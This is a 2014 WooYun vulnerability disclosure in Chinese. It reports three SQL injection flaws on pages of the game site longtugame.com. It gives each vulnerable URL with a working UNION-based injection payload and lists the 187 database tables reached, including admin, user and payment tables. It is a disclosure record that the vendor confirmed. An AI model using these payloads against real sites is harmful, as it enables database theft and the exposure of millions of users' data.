漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-066236
漏洞标题:龙图游戏多个sql注射(780多万用户数据可被脱裤)
相关厂商:longtugame.com
漏洞作者: sql
提交时间:2014-06-25 23:16
修复时间:2014-08-09 23:18
公开时间:2014-08-09 23:18
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:18
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-06-25: 细节已通知厂商并且等待厂商处理中
2014-06-26: 厂商已经确认,细节仅向厂商公开
2014-07-06: 细节向核心白帽子及相关领域专家公开
2014-07-16: 细节向普通白帽子公开
2014-07-26: 细节向实习白帽子公开
2014-08-09: 细节向公众公开
简要描述:
看到首页出了个刀塔的注射,就看了下这个站。发现了多个SQL注射,怕有重复,就合在一起写了。
详细说明:
看到首页出了个刀塔的注射,就看了下这个站。
发现了三个SQL注射,怕有重复,合在一起写了
第一个:
http://d.longtugame.com/daotadata/equipment?id=1
Title: MySQL UNION query (NULL) - 29 columns
Payload: id=-1463 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT
(0x3a62756f3a,0x7750784f737451484f41,0x3a7a70773a),NULL,NULL,NULL,NULL,NULL#
第2个:
http://d.longtugame.com/daotadata/hero?id=19
Title: MySQL UNION query (NULL) - 48 columns
Payload: id=-2114 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a7878693a,0x696671636c6f4261614
3,0x3a667a653a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL#
---
第三个:
http://d.longtugame.com/daotadata/zrgl?id=12
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=-1489 UNION ALL SELECT CONCAT(0x3a6b76783a,0x4a5270617641416d486
6,0x3a7961693a),NULL#
Database: dbe8je6i4c3gjd50
[187 tables]
+-------------------------------------------+
| adlist |
| adlist_bk |
| admin |
| area |
| article |
| article_comment |
| award |
| bind_mobile |
| card |
| cardtype |
| countrys |
| d_soc |
| day |
| dota_equipment |
| dota_fbdl |
| dota_hero |
| dota_skill |
| dota_xjcz |
| dota_zbhc |
| dota_zrzh |
| event_201403_log |
| event_day |
| event_hour |
| event_hour_tmp |
| exchange_orders |
| guidelist |
| hd_520_like_log |
| hd_520_photo |
| hd_520_user |
| hour |
| hour_tmp |
| ip_tmp |
| likes |
| lmcm_cyclopedia |
| lmcm_game |
| lmcm_game_extend |
| lmcm_gift |
| lmcm_gift_code |
| lmcm_message |
| lmcm_news |
| lmcm_news_cites |
| lmcm_picture |
| lmcm_recommend_game |
| lmcm_user_marking |
| lmcm_user_signin |
| mail |
| message |
| mob_notice |
| mobile_ad |
| mobile_ad2 |
| mobile_ad22 |
| mobile_ad500001 |
| mobile_ad500002 |
| mobile_ad500003 |
| mobile_ad500004 |
| mobile_ad500005 |
| mobile_ad500006 |
| mobile_ad500007 |
| mobile_ad500008 |
| mobile_ad500009 |
| mobile_ad500010 |
| mobile_ad510001 |
| mobile_ad510002 |
| mobile_ad510003 |
| mobile_ad510004 |
| mobile_ad510005 |
| mobile_ad510006 |
| mobile_ad510007 |
| mobile_ad510008 |
| mobile_ad510009 |
| mobile_ad520001 |
| mobile_ad520005 |
| mobile_ad520006 |
| mobile_ad521002 |
| mobile_ad530006 |
| mobile_ad_1 |
| mobile_ad_1002 |
| mobile_ad_2 |
| mobile_ad_3 |
| mobile_ad_4 |
| mobile_ad_5 |
| mobile_ad_6 |
| mobile_ad_7 |
| mobile_ad_8 |
| mobile_ad_9 |
| mobile_reserve |
| olduser_login_log |
| partner |
| partner_activity |
| partner_activity_code |
| pay_amount_package |
| pay_bills |
| pay_channel |
| pay_lcoins_package |
| pay_orders |
| pay_orders2 |
| product |
| product_item |
| product_keywords |
| question |
| question_recharge |
| retention_date |
| secret_codes |
| serverinfo |
| share_list |
| stat_overall_date |
| stat_overall_game |
| stat_overall_platform |
| stat_union |
| super_card |
| templatelist |
| ten_m |
| ten_m_tmp |
| testuser |
| tmp_a |
| tmp_ip |
| tmp_union_login |
| tmp_union_pay_orders |
| tmptable |
| tt_esports |
| turn_table |
| two_dimension |
| union_online |
| union_pay_orders |
| union_show |
| union_show_tmp |
| union_tag |
| union_user_login_log |
| union_users |
| unionclass |
| unionlist |
| user_bind_card |
| user_event |
| user_first_login |
| user_first_login_ |
| user_first_login_510 |
| user_first_login_51000 |
| user_first_login_510001 |
| user_first_login_510002 |
| user_first_login_510004 |
| user_first_login_510005 |
| user_first_login_510006 |
| user_first_login_510008 |
| user_first_login_510009 |
| user_first_login_520005 |
| user_first_login_520006 |
| user_first_login_521002 |
| user_first_login_530006 |
| user_first_login_longtugame_china_android |
| user_lcoins |
| user_login_log |
| user_login_log2 |
| user_login_log_ |
| user_login_log_510 |
| user_login_log_51000 |
| user_login_log_510001 |
| user_login_log_510002 |
| user_login_log_510004 |
| user_login_log_510005 |
| user_login_log_510006 |
| user_login_log_510008 |
| user_login_log_510009 |
| user_login_log_520005 |
| user_login_log_520006 |
| user_login_log_521002 |
| user_login_log_530006 |
| user_login_log_bk |
| user_login_log_longtugame_china_android |
| user_login_remain |
| user_register_log |
| users_master |
| users_slave_00 |
| users_slave_01 |
| users_slave_02 |
| users_slave_03 |
| users_slave_04 |
| users_slave_05 |
| users_slave_06 |
| users_slave_07 |
| users_slave_08 |
| users_slave_09 |
| users_slave_10 |
| users_slave_11 |
| users_slave_12 |
漏洞证明:
同上
修复方案:
过滤
版权声明:转载请注明来源 sql@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2014-06-26 02:15
厂商回复:
感谢指出问题,我们正在修复及验证
最新状态:
暂无